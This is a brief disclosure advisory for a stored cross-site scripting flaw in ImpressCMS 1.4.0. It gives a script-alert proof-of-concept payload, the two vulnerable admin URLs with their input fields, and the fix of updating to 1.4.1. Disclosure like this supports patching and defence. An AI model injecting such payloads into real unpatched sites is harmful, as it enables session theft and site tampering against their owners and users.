Impress CMS version 1.4.0 suffers from a cross site scripting vulnerability.
029b019e3aee7ed3d4048cb1c2d4d9a0
#Author: AppleBois
#Homepage: https://sourceforge.net/projects/impresscms/
#Affected Version: 1.4.0
#Stored XSS
#Allows an attacker to execute arbitrary HTML and JavaScript code
#Solution: Update to 1.4.1
#More information : https://github.com/ImpressCMS/impresscms/issues/659
Payload = <script>alert('AppleBois');</script>
Vulnerable URL :modules/system/admin.php?fct=adsense&op=mod&adsenseid=4
Vulnerable TextBar : ID of the [adsense tag to display this ad]
Vulnerable URL :/modules/system/admin.php?fct=customtag&op=mod
Vulnerable TextBar : Name